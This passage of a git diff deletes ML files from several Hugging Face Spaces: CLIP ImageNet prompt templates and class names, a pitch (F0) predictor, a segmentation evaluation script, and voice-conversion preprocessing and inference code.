- lambda c: f'a low resolution photo of the {c}.', - lambda c: f'a rendering of a {c}.', - lambda c: f'graffiti of a {c}.', - lambda c: f'a bad photo of the {c}.', - lambda c: f'a cropped photo of the {c}.', - lambda c: f'a tattoo of a {c}.', - lambda c: f'the embroidered {c}.', - lambda c: f'a photo of a hard to see {c}.', - lambda c: f'a bright photo of a {c}.', - lambda c: f'a photo of a clean {c}.', - lambda c: f'a photo of a dirty {c}.', - lambda c: f'a dark photo of the {c}.', - lambda c: f'a drawing of a {c}.', - lambda c: f'a photo of my {c}.', - lambda c: f'the plastic {c}.', - lambda c: f'a photo of the cool {c}.', - lambda c: f'a close-up photo of a {c}.', - lambda c: f'a black and white photo of the {c}.', - lambda c: f'a painting of the {c}.', - lambda c: f'a painting of a {c}.', - lambda c: f'a pixelated photo of the {c}.', - lambda c: f'a sculpture of the {c}.', - lambda c: f'a bright photo of the {c}.', - lambda c: f'a cropped photo of a {c}.', - lambda c: f'a plastic {c}.', - lambda c: f'a photo of the dirty {c}.', - lambda 
c: f'a jpeg corrupted photo of a {c}.', - lambda c: f'a blurry photo of the {c}.', - lambda c: f'a photo of the {c}.', - lambda c: f'a good photo of the {c}.', - lambda c: f'a rendering of the {c}.', - lambda c: f'a {c} in a video game.', - lambda c: f'a photo of one {c}.', - lambda c: f'a doodle of a {c}.', - lambda c: f'a close-up photo of the {c}.', - lambda c: f'a photo of a {c}.', - lambda c: f'the origami {c}.', - lambda c: f'the {c} in a video game.', - lambda c: f'a sketch of a {c}.', - lambda c: f'a doodle of the {c}.', - lambda c: f'a origami {c}.', - lambda c: f'a low resolution photo of a {c}.', - lambda c: f'the toy {c}.', - lambda c: f'a rendition of the {c}.', - lambda c: f'a photo of the clean {c}.', - lambda c: f'a photo of a large {c}.', - lambda c: f'a rendition of a {c}.', - lambda c: f'a photo of a nice {c}.', - lambda c: f'a photo of a weird {c}.', - lambda c: f'a blurry photo of a {c}.', - lambda c: f'a cartoon {c}.', - lambda c: f'art of a {c}.', - lambda c: f'a sketch of the {c}.', - lambda c: f'a embroidered {c}.', - lambda c: f'a pixelated photo of a {c}.', - lambda c: f'itap of the {c}.', - lambda c: f'a jpeg corrupted photo of the {c}.', - lambda c: f'a good photo of a {c}.', - lambda c: f'a plushie {c}.', - lambda c: f'a photo of the nice {c}.', - lambda c: f'a photo of the small {c}.', - lambda c: f'a photo of the weird {c}.', - lambda c: f'the cartoon {c}.', - lambda c: f'art of the {c}.', - lambda c: f'a drawing of the {c}.', - lambda c: f'a photo of the large {c}.', - lambda c: f'a black and white photo of a {c}.', - lambda c: f'the plushie {c}.', - lambda c: f'a dark photo of a {c}.', - lambda c: f'itap of a {c}.', - lambda c: f'graffiti of the {c}.', - lambda c: f'a toy {c}.', - lambda c: f'itap of my {c}.', - lambda c: f'a photo of a cool {c}.', - lambda c: f'a photo of a small {c}.', - lambda c: f'a tattoo of the {c}.', -) - - -# a much smaller subset of above prompts -# from https://github.com/openai/CLIP/blob/main/notebooks/Prompt_Engineering_for_ImageNet.ipynb -SIMPLE_IMAGENET_TEMPLATES = ( - lambda c: f'itap of a {c}.', - lambda c: f'a bad photo of the {c}.', - lambda c: f'a origami {c}.', - lambda c: f'a photo of the large {c}.', - lambda c: f'a {c} in a video game.', - lambda c: f'art of the {c}.', - lambda c: f'a photo of the small {c}.', -) - - -IMAGENET_CLASSNAMES = ( - "tench", "goldfish", "great white shark", "tiger shark", "hammerhead shark", "electric ray", - "stingray", "rooster", "hen", "ostrich", "brambling", "goldfinch", "house finch", "junco", - "indigo bunting", "American robin", "bulbul", "jay", "magpie", "chickadee", "American dipper", - "kite (bird of prey)", "bald eagle", "vulture", "great grey owl", "fire salamander", - "smooth newt", "newt", "spotted salamander", "axolotl", "American bullfrog", "tree frog", - "tailed frog", "loggerhead sea turtle", "leatherback sea turtle", "mud turtle", "terrapin", - "box turtle", "banded gecko", "green iguana", "Carolina anole", - "desert grassland whiptail lizard", "agama", "frilled-necked lizard", "alligator lizard", - "Gila monster", "European green lizard", "chameleon", "Komodo dragon", "Nile crocodile", - "American alligator", "triceratops", "worm snake", "ring-necked snake", - "eastern hog-nosed snake", "smooth green snake", "kingsnake", "garter snake", "water snake", - "vine snake", "night snake", "boa constrictor", "African rock python", "Indian cobra", - "green mamba", "sea snake", "Saharan horned viper", "eastern diamondback rattlesnake", - "sidewinder rattlesnake", "trilobite", 
"harvestman", "scorpion", "yellow garden spider", - "barn spider", "European garden spider", "southern black widow", "tarantula", "wolf spider", - "tick", "centipede", "black grouse", "ptarmigan", "ruffed grouse", "prairie grouse", "peafowl", - "quail", "partridge", "african grey parrot", "macaw", "sulphur-crested cockatoo", "lorikeet", - "coucal", "bee eater", "hornbill", "hummingbird", "jacamar", "toucan", "duck", - "red-breasted merganser", "goose", "black swan", "tusker", "echidna", "platypus", "wallaby", - "koala", "wombat", "jellyfish", "sea anemone", "brain coral", "flatworm", "nematode", "conch", - "snail", "slug", "sea slug", "chiton", "chambered nautilus", "Dungeness crab", "rock crab", - "fiddler crab", "red king crab", "American lobster", "spiny lobster", "crayfish", "hermit crab", - "isopod", "white stork", "black stork", "spoonbill", "flamingo", "little blue heron", - "great egret", "bittern bird", "crane bird", "limpkin", "common gallinule", "American coot", - "bustard", "ruddy turnstone", "dunlin", "common redshank", "dowitcher", "oystercatcher", - "pelican", "king penguin", "albatross", "grey whale", "killer whale", "dugong", "sea lion", - "Chihuahua", "Japanese Chin", "Maltese", "Pekingese", "Shih Tzu", "King Charles Spaniel", - "Papillon", "toy terrier", "Rhodesian Ridgeback", "Afghan Hound", "Basset Hound", "Beagle", - "Bloodhound", "Bluetick Coonhound", "Black and Tan Coonhound", "Treeing Walker Coonhound", - "English foxhound", "Redbone Coonhound", "borzoi", "Irish Wolfhound", "Italian Greyhound", - "Whippet", "Ibizan Hound", "Norwegian Elkhound", "Otterhound", "Saluki", "Scottish Deerhound", - "Weimaraner", "Staffordshire Bull Terrier", "American Staffordshire Terrier", - "Bedlington Terrier", "Border Terrier", "Kerry Blue Terrier", "Irish Terrier", - "Norfolk Terrier", "Norwich Terrier", "Yorkshire Terrier", "Wire Fox Terrier", - "Lakeland Terrier", "Sealyham Terrier", "Airedale Terrier", "Cairn Terrier", - "Australian Terrier", "Dandie Dinmont Terrier", "Boston Terrier", "Miniature Schnauzer", - "Giant Schnauzer", "Standard Schnauzer", "Scottish Terrier", "Tibetan Terrier", - "Australian Silky Terrier", "Soft-coated Wheaten Terrier", "West Highland White Terrier", - "Lhasa Apso", "Flat-Coated Retriever", "Curly-coated Retriever", "Golden Retriever", - "Labrador Retriever", "Chesapeake Bay Retriever", "German Shorthaired Pointer", "Vizsla", - "English Setter", "Irish Setter", "Gordon Setter", "Brittany dog", "Clumber Spaniel", - "English Springer Spaniel", "Welsh Springer Spaniel", "Cocker Spaniel", "Sussex Spaniel", - "Irish Water Spaniel", "Kuvasz", "Schipperke", "Groenendael dog", "Malinois", "Briard", - "Australian Kelpie", "Komondor", "Old English Sheepdog", "Shetland Sheepdog", "collie", - "Border Collie", "Bouvier des Flandres dog", "Rottweiler", "German Shepherd Dog", "Dobermann", - "Miniature Pinscher", "Greater Swiss Mountain Dog", "Bernese Mountain Dog", - "Appenzeller Sennenhund", "Entlebucher Sennenhund", "Boxer", "Bullmastiff", "Tibetan Mastiff", - "French Bulldog", "Great Dane", "St. 
Bernard", "husky", "Alaskan Malamute", "Siberian Husky", - "Dalmatian", "Affenpinscher", "Basenji", "pug", "Leonberger", "Newfoundland dog", - "Great Pyrenees dog", "Samoyed", "Pomeranian", "Chow Chow", "Keeshond", "brussels griffon", - "Pembroke Welsh Corgi", "Cardigan Welsh Corgi", "Toy Poodle", "Miniature Poodle", - "Standard Poodle", "Mexican hairless dog (xoloitzcuintli)", "grey wolf", "Alaskan tundra wolf", - "red wolf or maned wolf", "coyote", "dingo", "dhole", "African wild dog", "hyena", "red fox", - "kit fox", "Arctic fox", "grey fox", "tabby cat", "tiger cat", "Persian cat", "Siamese cat", - "Egyptian Mau", "cougar", "lynx", "leopard", "snow leopard", "jaguar", "lion", "tiger", - "cheetah", "brown bear", "American black bear", "polar bear", "sloth bear", "mongoose", - "meerkat", "tiger beetle", "ladybug", "ground beetle", "longhorn beetle", "leaf beetle", - "dung beetle", "rhinoceros beetle", "weevil", "fly", "bee", "ant", "grasshopper", - "cricket insect", "stick insect", "cockroach", "praying mantis", "cicada", "leafhopper", - "lacewing", "dragonfly", "damselfly", "red admiral butterfly", "ringlet butterfly", - "monarch butterfly", "small white butterfly", "sulphur butterfly", "gossamer-winged butterfly", - "starfish", "sea urchin", "sea cucumber", "cottontail rabbit", "hare", "Angora rabbit", - "hamster", "porcupine", "fox squirrel", "marmot", "beaver", "guinea pig", "common sorrel horse", - "zebra", "pig", "wild boar", "warthog", "hippopotamus", "ox", "water buffalo", "bison", - "ram (adult male sheep)", "bighorn sheep", "Alpine ibex", "hartebeest", "impala (antelope)", - "gazelle", "arabian camel", "llama", "weasel", "mink", "European polecat", - "black-footed ferret", "otter", "skunk", "badger", "armadillo", "three-toed sloth", "orangutan", - "gorilla", "chimpanzee", "gibbon", "siamang", "guenon", "patas monkey", "baboon", "macaque", - "langur", "black-and-white colobus", "proboscis monkey", "marmoset", "white-headed capuchin", - "howler monkey", "titi monkey", "Geoffroy's spider monkey", "common squirrel monkey", - "ring-tailed lemur", "indri", "Asian elephant", "African bush elephant", "red panda", - "giant panda", "snoek fish", "eel", "silver salmon", "rock beauty fish", "clownfish", - "sturgeon", "gar fish", "lionfish", "pufferfish", "abacus", "abaya", "academic gown", - "accordion", "acoustic guitar", "aircraft carrier", "airliner", "airship", "altar", "ambulance", - "amphibious vehicle", "analog clock", "apiary", "apron", "trash can", "assault rifle", - "backpack", "bakery", "balance beam", "balloon", "ballpoint pen", "Band-Aid", "banjo", - "baluster / handrail", "barbell", "barber chair", "barbershop", "barn", "barometer", "barrel", - "wheelbarrow", "baseball", "basketball", "bassinet", "bassoon", "swimming cap", "bath towel", - "bathtub", "station wagon", "lighthouse", "beaker", "military hat (bearskin or shako)", - "beer bottle", "beer glass", "bell tower", "baby bib", "tandem bicycle", "bikini", - "ring binder", "binoculars", "birdhouse", "boathouse", "bobsleigh", "bolo tie", "poke bonnet", - "bookcase", "bookstore", "bottle cap", "hunting bow", "bow tie", "brass memorial plaque", "bra", - "breakwater", "breastplate", "broom", "bucket", "buckle", "bulletproof vest", - "high-speed train", "butcher shop", "taxicab", "cauldron", "candle", "cannon", "canoe", - "can opener", "cardigan", "car mirror", "carousel", "tool kit", "cardboard box / carton", - "car wheel", "automated teller machine", "cassette", "cassette player", "castle", "catamaran", - "CD player", "cello", 
"mobile phone", "chain", "chain-link fence", "chain mail", "chainsaw", - "storage chest", "chiffonier", "bell or wind chime", "china cabinet", "Christmas stocking", - "church", "movie theater", "cleaver", "cliff dwelling", "cloak", "clogs", "cocktail shaker", - "coffee mug", "coffeemaker", "spiral or coil", "combination lock", "computer keyboard", - "candy store", "container ship", "convertible", "corkscrew", "cornet", "cowboy boot", - "cowboy hat", "cradle", "construction crane", "crash helmet", "crate", "infant bed", - "Crock Pot", "croquet ball", "crutch", "cuirass", "dam", "desk", "desktop computer", - "rotary dial telephone", "diaper", "digital clock", "digital watch", "dining table", - "dishcloth", "dishwasher", "disc brake", "dock", "dog sled", "dome", "doormat", "drilling rig", - "drum", "drumstick", "dumbbell", "Dutch oven", "electric fan", "electric guitar", - "electric locomotive", "entertainment center", "envelope", "espresso machine", "face powder", - "feather boa", "filing cabinet", "fireboat", "fire truck", "fire screen", "flagpole", "flute", - "folding chair", "football helmet", "forklift", "fountain", "fountain pen", "four-poster bed", - "freight car", "French horn", "frying pan", "fur coat", "garbage truck", - "gas mask or respirator", "gas pump", "goblet", "go-kart", "golf ball", "golf cart", "gondola", - "gong", "gown", "grand piano", "greenhouse", "radiator grille", "grocery store", "guillotine", - "hair clip", "hair spray", "half-track", "hammer", "hamper", "hair dryer", "hand-held computer", - "handkerchief", "hard disk drive", "harmonica", "harp", "combine harvester", "hatchet", - "holster", "home theater", "honeycomb", "hook", "hoop skirt", "gymnastic horizontal bar", - "horse-drawn vehicle", "hourglass", "iPod", "clothes iron", "carved pumpkin", "jeans", "jeep", - "T-shirt", "jigsaw puzzle", "rickshaw", "joystick", "kimono", "knee pad", "knot", "lab coat", - "ladle", "lampshade", "laptop computer", "lawn mower", "lens cap", "letter opener", "library", - "lifeboat", "lighter", "limousine", "ocean liner", "lipstick", "slip-on shoe", "lotion", - "music speaker", "loupe magnifying glass", "sawmill", "magnetic compass", "messenger bag", - "mailbox", "tights", "one-piece bathing suit", "manhole cover", "maraca", "marimba", "mask", - "matchstick", "maypole", "maze", "measuring cup", "medicine cabinet", "megalith", "microphone", - "microwave oven", "military uniform", "milk can", "minibus", "miniskirt", "minivan", "missile", - "mitten", "mixing bowl", "mobile home", "ford model t", "modem", "monastery", "monitor", - "moped", "mortar and pestle", "graduation cap", "mosque", "mosquito net", "vespa", - "mountain bike", "tent", "computer mouse", "mousetrap", "moving van", "muzzle", "metal nail", - "neck brace", "necklace", "baby pacifier", "notebook computer", "obelisk", "oboe", "ocarina", - "odometer", "oil filter", "pipe organ", "oscilloscope", "overskirt", "bullock cart", - "oxygen mask", "product packet / packaging", "paddle", "paddle wheel", "padlock", "paintbrush", - "pajamas", "palace", "pan flute", "paper towel", "parachute", "parallel bars", "park bench", - "parking meter", "railroad car", "patio", "payphone", "pedestal", "pencil case", - "pencil sharpener", "perfume", "Petri dish", "photocopier", "plectrum", "Pickelhaube", - "picket fence", "pickup truck", "pier", "piggy bank", "pill bottle", "pillow", "ping-pong ball", - "pinwheel", "pirate ship", "drink pitcher", "block plane", "planetarium", "plastic bag", - "plate rack", "farm plow", "plunger", "Polaroid 
camera", "pole", "police van", "poncho", - "pool table", "soda bottle", "plant pot", "potter's wheel", "power drill", "prayer rug", - "printer", "prison", "missile", "projector", "hockey puck", "punching bag", "purse", "quill", - "quilt", "race car", "racket", "radiator", "radio", "radio telescope", "rain barrel", - "recreational vehicle", "fishing casting reel", "reflex camera", "refrigerator", - "remote control", "restaurant", "revolver", "rifle", "rocking chair", "rotisserie", "eraser", - "rugby ball", "ruler measuring stick", "sneaker", "safe", "safety pin", "salt shaker", "sandal", - "sarong", "saxophone", "scabbard", "weighing scale", "school bus", "schooner", "scoreboard", - "CRT monitor", "screw", "screwdriver", "seat belt", "sewing machine", "shield", "shoe store", - "shoji screen / room divider", "shopping basket", "shopping cart", "shovel", "shower cap", - "shower curtain", "ski", "balaclava ski mask", "sleeping bag", "slide rule", "sliding door", - "slot machine", "snorkel", "snowmobile", "snowplow", "soap dispenser", "soccer ball", "sock", - "solar thermal collector", "sombrero", "soup bowl", "keyboard space bar", "space heater", - "space shuttle", "spatula", "motorboat", "spider web", "spindle", "sports car", "spotlight", - "stage", "steam locomotive", "through arch bridge", "steel drum", "stethoscope", "scarf", - "stone wall", "stopwatch", "stove", "strainer", "tram", "stretcher", "couch", "stupa", - "submarine", "suit", "sundial", "sunglasses", "sunglasses", "sunscreen", "suspension bridge", - "mop", "sweatshirt", "swim trunks / shorts", "swing", "electrical switch", "syringe", - "table lamp", "tank", "tape player", "teapot", "teddy bear", "television", "tennis ball", - "thatched roof", "front curtain", "thimble", "threshing machine", "throne", "tile roof", - "toaster", "tobacco shop", "toilet seat", "torch", "totem pole", "tow truck", "toy store", - "tractor", "semi-trailer truck", "tray", "trench coat", "tricycle", "trimaran", "tripod", - "triumphal arch", "trolleybus", "trombone", "hot tub", "turnstile", "typewriter keyboard", - "umbrella", "unicycle", "upright piano", "vacuum cleaner", "vase", "vaulted or arched ceiling", - "velvet fabric", "vending machine", "vestment", "viaduct", "violin", "volleyball", - "waffle iron", "wall clock", "wallet", "wardrobe", "military aircraft", "sink", - "washing machine", "water bottle", "water jug", "water tower", "whiskey jug", "whistle", - "hair wig", "window screen", "window shade", "Windsor tie", "wine bottle", "airplane wing", - "wok", "wooden spoon", "wool", "split-rail fence", "shipwreck", "sailboat", "yurt", "website", - "comic book", "crossword", "traffic or street sign", "traffic light", "dust jacket", "menu", - "plate", "guacamole", "consomme", "hot pot", "trifle", "ice cream", "popsicle", "baguette", - "bagel", "pretzel", "cheeseburger", "hot dog", "mashed potatoes", "cabbage", "broccoli", - "cauliflower", "zucchini", "spaghetti squash", "acorn squash", "butternut squash", "cucumber", - "artichoke", "bell pepper", "cardoon", "mushroom", "Granny Smith apple", "strawberry", "orange", - "lemon", "fig", "pineapple", "banana", "jackfruit", "cherimoya (custard apple)", "pomegranate", - "hay", "carbonara", "chocolate syrup", "dough", "meatloaf", "pizza", "pot pie", "burrito", - "red wine", "espresso", "tea cup", "eggnog", "mountain", "bubble", "cliff", "coral reef", - "geyser", "lakeshore", "promontory", "sandbar", "beach", "valley", "volcano", "baseball player", - "bridegroom", "scuba diver", "rapeseed", "daisy", "yellow lady's 
slipper", "corn", "acorn", - "rose hip", "horse chestnut seed", "coral fungus", "agaric", "gyromitra", "stinkhorn mushroom", - "earth star fungus", "hen of the woods mushroom", "bolete", "corn cob", "toilet paper" -) - diff --git a/spaces/LaynzKunz/Advanced-RVC-Inference/lib/infer_pack/modules/F0Predictor/HarvestF0Predictor.py b/spaces/LaynzKunz/Advanced-RVC-Inference/lib/infer_pack/modules/F0Predictor/HarvestF0Predictor.py deleted file mode 100644 index b412ba2814e114ca7bb00b6fd6ef217f63d788a3..0000000000000000000000000000000000000000 --- a/spaces/LaynzKunz/Advanced-RVC-Inference/lib/infer_pack/modules/F0Predictor/HarvestF0Predictor.py +++ /dev/null @@ -1,86 +0,0 @@ -from lib.infer_pack.modules.F0Predictor.F0Predictor import F0Predictor -import pyworld -import numpy as np - - -class HarvestF0Predictor(F0Predictor): - def __init__(self, hop_length=512, f0_min=50, f0_max=1100, sampling_rate=44100): - self.hop_length = hop_length - self.f0_min = f0_min - self.f0_max = f0_max - self.sampling_rate = sampling_rate - - def interpolate_f0(self, f0): - """ - 对F0进行插值处理 - """ - - data = np.reshape(f0, (f0.size, 1)) - - vuv_vector = np.zeros((data.size, 1), dtype=np.float32) - vuv_vector[data > 0.0] = 1.0 - vuv_vector[data <= 0.0] = 0.0 - - ip_data = data - - frame_number = data.size - last_value = 0.0 - for i in range(frame_number): - if data[i] <= 0.0: - j = i + 1 - for j in range(i + 1, frame_number): - if data[j] > 0.0: - break - if j < frame_number - 1: - if last_value > 0.0: - step = (data[j] - data[i - 1]) / float(j - i) - for k in range(i, j): - ip_data[k] = data[i - 1] + step * (k - i + 1) - else: - for k in range(i, j): - ip_data[k] = data[j] - else: - for k in range(i, frame_number): - ip_data[k] = last_value - else: - ip_data[i] = data[i] # 这里可能存在一个没有必要的拷贝 - last_value = data[i] - - return ip_data[:, 0], vuv_vector[:, 0] - - def resize_f0(self, x, target_len): - source = np.array(x) - source[source < 0.001] = np.nan - target = np.interp( - np.arange(0, len(source) * target_len, len(source)) / target_len, - np.arange(0, len(source)), - source, - ) - res = np.nan_to_num(target) - return res - - def compute_f0(self, wav, p_len=None): - if p_len is None: - p_len = wav.shape[0] // self.hop_length - f0, t = pyworld.harvest( - wav.astype(np.double), - fs=self.hop_length, - f0_ceil=self.f0_max, - f0_floor=self.f0_min, - frame_period=1000 * self.hop_length / self.sampling_rate, - ) - f0 = pyworld.stonemask(wav.astype(np.double), f0, t, self.fs) - return self.interpolate_f0(self.resize_f0(f0, p_len))[0] - - def compute_f0_uv(self, wav, p_len=None): - if p_len is None: - p_len = wav.shape[0] // self.hop_length - f0, t = pyworld.harvest( - wav.astype(np.double), - fs=self.sampling_rate, - f0_floor=self.f0_min, - f0_ceil=self.f0_max, - frame_period=1000 * self.hop_length / self.sampling_rate, - ) - f0 = pyworld.stonemask(wav.astype(np.double), f0, t, self.sampling_rate) - return self.interpolate_f0(self.resize_f0(f0, p_len)) diff --git a/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/interact/fbrs/inference/evaluation.py b/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/interact/fbrs/inference/evaluation.py deleted file mode 100644 index 6be3ed813eb257309f433ece0035e0890a82207e..0000000000000000000000000000000000000000 --- a/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/interact/fbrs/inference/evaluation.py +++ /dev/null @@ -1,56 +0,0 @@ -from time 
import time - -import numpy as np -import torch - -from ..inference import utils -from ..inference.clicker import Clicker - -try: - get_ipython() - from tqdm import tqdm_notebook as tqdm -except NameError: - from tqdm import tqdm - - -def evaluate_dataset(dataset, predictor, oracle_eval=False, **kwargs): - all_ious = [] - - start_time = time() - for index in tqdm(range(len(dataset)), leave=False): - sample = dataset.get_sample(index) - item = dataset[index] - - if oracle_eval: - gt_mask = torch.tensor(sample['instances_mask'], dtype=torch.float32) - gt_mask = gt_mask.unsqueeze(0).unsqueeze(0) - predictor.opt_functor.mask_loss.set_gt_mask(gt_mask) - _, sample_ious, _ = evaluate_sample(item['images'], sample['instances_mask'], predictor, **kwargs) - all_ious.append(sample_ious) - end_time = time() - elapsed_time = end_time - start_time - - return all_ious, elapsed_time - - -def evaluate_sample(image_nd, instances_mask, predictor, max_iou_thr, - pred_thr=0.49, max_clicks=20): - clicker = Clicker(gt_mask=instances_mask) - pred_mask = np.zeros_like(instances_mask) - ious_list = [] - - with torch.no_grad(): - predictor.set_input_image(image_nd) - - for click_number in range(max_clicks): - clicker.make_next_click(pred_mask) - pred_probs = predictor.get_prediction(clicker) - pred_mask = pred_probs > pred_thr - - iou = utils.get_iou(instances_mask, pred_mask) - ious_list.append(iou) - - if iou >= max_iou_thr: - break - - return clicker.clicks_list, np.array(ious_list, dtype=np.float32), pred_probs diff --git a/spaces/MarcusSu1216/XingTong/preprocess_flist_config.py b/spaces/MarcusSu1216/XingTong/preprocess_flist_config.py deleted file mode 100644 index 00535054a20fd81dcbbb4ac5f44e504a2bd2771d..0000000000000000000000000000000000000000 --- a/spaces/MarcusSu1216/XingTong/preprocess_flist_config.py +++ /dev/null @@ -1,75 +0,0 @@ -import os -import argparse -import re - -from tqdm import tqdm -from random import shuffle -import json -import wave - -config_template = json.load(open("configs_template/config_template.json")) - -pattern = re.compile(r'^[\.a-zA-Z0-9_\/]+$') - -def get_wav_duration(file_path): - with wave.open(file_path, 'rb') as wav_file: - # 获取音频帧数 - n_frames = wav_file.getnframes() - # 获取采样率 - framerate = wav_file.getframerate() - # 计算时长(秒) - duration = n_frames / float(framerate) - return duration - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument("--train_list", type=str, default="./filelists/train.txt", help="path to train list") - parser.add_argument("--val_list", type=str, default="./filelists/val.txt", help="path to val list") - parser.add_argument("--source_dir", type=str, default="./dataset/44k", help="path to source dir") - args = parser.parse_args() - - train = [] - val = [] - idx = 0 - spk_dict = {} - spk_id = 0 - for speaker in tqdm(os.listdir(args.source_dir)): - spk_dict[speaker] = spk_id - spk_id += 1 - wavs = ["/".join([args.source_dir, speaker, i]) for i in os.listdir(os.path.join(args.source_dir, speaker))] - new_wavs = [] - for file in wavs: - if not file.endswith("wav"): - continue - #if not pattern.match(file): - # print(f"warning:文件名{file}中包含非字母数字下划线,可能会导致错误。(也可能不会)") - if get_wav_duration(file) < 0.3: - print("skip too short audio:", file) - continue - new_wavs.append(file) - wavs = new_wavs - shuffle(wavs) - train += wavs[2:] - val += wavs[:2] - - shuffle(train) - shuffle(val) - - print("Writing", args.train_list) - with open(args.train_list, "w") as f: - for fname in tqdm(train): - wavpath = fname - f.write(wavpath + "\n") - - 
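    # Illustrative sketch only, not part of this script: the lists written here and below
    # contain one wav path per line under ./dataset/44k/<speaker>/<clip>.wav (the defaults
    # above), and the speaker-to-id map is stored under "spk" in configs/config.json at the
    # end of this script, so the two can be paired back up roughly like this:
    #
    #   import json
    #   def load_filelist(list_path, spk_map_path="configs/config.json"):
    #       spk = json.load(open(spk_map_path))["spk"]
    #       return [(p, spk[p.split("/")[-2]])
    #               for p in (line.strip() for line in open(list_path)) if p]
    #
    #   train_pairs = load_filelist("./filelists/train.txt")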
print("Writing", args.val_list) - with open(args.val_list, "w") as f: - for fname in tqdm(val): - wavpath = fname - f.write(wavpath + "\n") - - config_template["spk"] = spk_dict - config_template["model"]["n_speakers"] = spk_id - - print("Writing configs/config.json") - with open("configs/config.json", "w") as f: - json.dump(config_template, f, indent=2) diff --git a/spaces/MashiroSA/sovits-emu-voice-transform/inference/infer_tool_grad.py b/spaces/MashiroSA/sovits-emu-voice-transform/inference/infer_tool_grad.py deleted file mode 100644 index b75af49c08e2e724839828bc419792ed580809bb..0000000000000000000000000000000000000000 --- a/spaces/MashiroSA/sovits-emu-voice-transform/inference/infer_tool_grad.py +++ /dev/null @@ -1,160 +0,0 @@ -import hashlib -import json -import logging -import os -import time -from pathlib import Path -import io -import librosa -import maad -import numpy as np -from inference import slicer -import parselmouth -import soundfile -import torch -import torchaudio - -from hubert import hubert_model -import utils -from models import SynthesizerTrn -logging.getLogger('numba').setLevel(logging.WARNING) -logging.getLogger('matplotlib').setLevel(logging.WARNING) - -def resize2d_f0(x, target_len): - source = np.array(x) - source[source < 0.001] = np.nan - target = np.interp(np.arange(0, len(source) * target_len, len(source)) / target_len, np.arange(0, len(source)), - source) - res = np.nan_to_num(target) - return res - -def get_f0(x, p_len,f0_up_key=0): - - time_step = 160 / 16000 * 1000 - f0_min = 50 - f0_max = 1100 - f0_mel_min = 1127 * np.log(1 + f0_min / 700) - f0_mel_max = 1127 * np.log(1 + f0_max / 700) - - f0 = parselmouth.Sound(x, 16000).to_pitch_ac( - time_step=time_step / 1000, voicing_threshold=0.6, - pitch_floor=f0_min, pitch_ceiling=f0_max).selected_array['frequency'] - - pad_size=(p_len - len(f0) + 1) // 2 - if(pad_size>0 or p_len - len(f0) - pad_size>0): - f0 = np.pad(f0,[[pad_size,p_len - len(f0) - pad_size]], mode='constant') - - f0 *= pow(2, f0_up_key / 12) - f0_mel = 1127 * np.log(1 + f0 / 700) - f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - f0_mel_min) * 254 / (f0_mel_max - f0_mel_min) + 1 - f0_mel[f0_mel <= 1] = 1 - f0_mel[f0_mel > 255] = 255 - f0_coarse = np.rint(f0_mel).astype(np.int) - return f0_coarse, f0 - -def clean_pitch(input_pitch): - num_nan = np.sum(input_pitch == 1) - if num_nan / len(input_pitch) > 0.9: - input_pitch[input_pitch != 1] = 1 - return input_pitch - - -def plt_pitch(input_pitch): - input_pitch = input_pitch.astype(float) - input_pitch[input_pitch == 1] = np.nan - return input_pitch - - -def f0_to_pitch(ff): - f0_pitch = 69 + 12 * np.log2(ff / 440) - return f0_pitch - - -def fill_a_to_b(a, b): - if len(a) < len(b): - for _ in range(0, len(b) - len(a)): - a.append(a[0]) - - -def mkdir(paths: list): - for path in paths: - if not os.path.exists(path): - os.mkdir(path) - - -class VitsSvc(object): - def __init__(self): - self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - self.SVCVITS = None - self.hps = None - self.speakers = None - self.hubert_soft = utils.get_hubert_model() - - def set_device(self, device): - self.device = torch.device(device) - self.hubert_soft.to(self.device) - if self.SVCVITS != None: - self.SVCVITS.to(self.device) - - def loadCheckpoint(self, path): - self.hps = utils.get_hparams_from_file(f"checkpoints/{path}/config.json") - self.SVCVITS = SynthesizerTrn( - self.hps.data.filter_length // 2 + 1, - self.hps.train.segment_size // self.hps.data.hop_length, - **self.hps.model) - _ = 
utils.load_checkpoint(f"checkpoints/{path}/model.pth", self.SVCVITS, None) - _ = self.SVCVITS.eval().to(self.device) - self.speakers = self.hps.spk - - def get_units(self, source, sr): - source = source.unsqueeze(0).to(self.device) - with torch.inference_mode(): - units = self.hubert_soft.units(source) - return units - - - def get_unit_pitch(self, in_path, tran): - source, sr = torchaudio.load(in_path) - source = torchaudio.functional.resample(source, sr, 16000) - if len(source.shape) == 2 and source.shape[1] >= 2: - source = torch.mean(source, dim=0).unsqueeze(0) - soft = self.get_units(source, sr).squeeze(0).cpu().numpy() - f0_coarse, f0 = get_f0(source.cpu().numpy()[0], soft.shape[0]*2, tran) - return soft, f0 - - def infer(self, speaker_id, tran, raw_path): - speaker_id = self.speakers[speaker_id] - sid = torch.LongTensor([int(speaker_id)]).to(self.device).unsqueeze(0) - soft, pitch = self.get_unit_pitch(raw_path, tran) - f0 = torch.FloatTensor(clean_pitch(pitch)).unsqueeze(0).to(self.device) - stn_tst = torch.FloatTensor(soft) - with torch.no_grad(): - x_tst = stn_tst.unsqueeze(0).to(self.device) - x_tst = torch.repeat_interleave(x_tst, repeats=2, dim=1).transpose(1, 2) - audio = self.SVCVITS.infer(x_tst, f0=f0, g=sid)[0,0].data.float() - return audio, audio.shape[-1] - - def inference(self,srcaudio,chara,tran,slice_db): - sampling_rate, audio = srcaudio - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - soundfile.write("tmpwav.wav", audio, 16000, format="wav") - chunks = slicer.cut("tmpwav.wav", db_thresh=slice_db) - audio_data, audio_sr = slicer.chunks2audio("tmpwav.wav", chunks) - audio = [] - for (slice_tag, data) in audio_data: - length = int(np.ceil(len(data) / audio_sr * self.hps.data.sampling_rate)) - raw_path = io.BytesIO() - soundfile.write(raw_path, data, audio_sr, format="wav") - raw_path.seek(0) - if slice_tag: - _audio = np.zeros(length) - else: - out_audio, out_sr = self.infer(chara, tran, raw_path) - _audio = out_audio.cpu().numpy() - 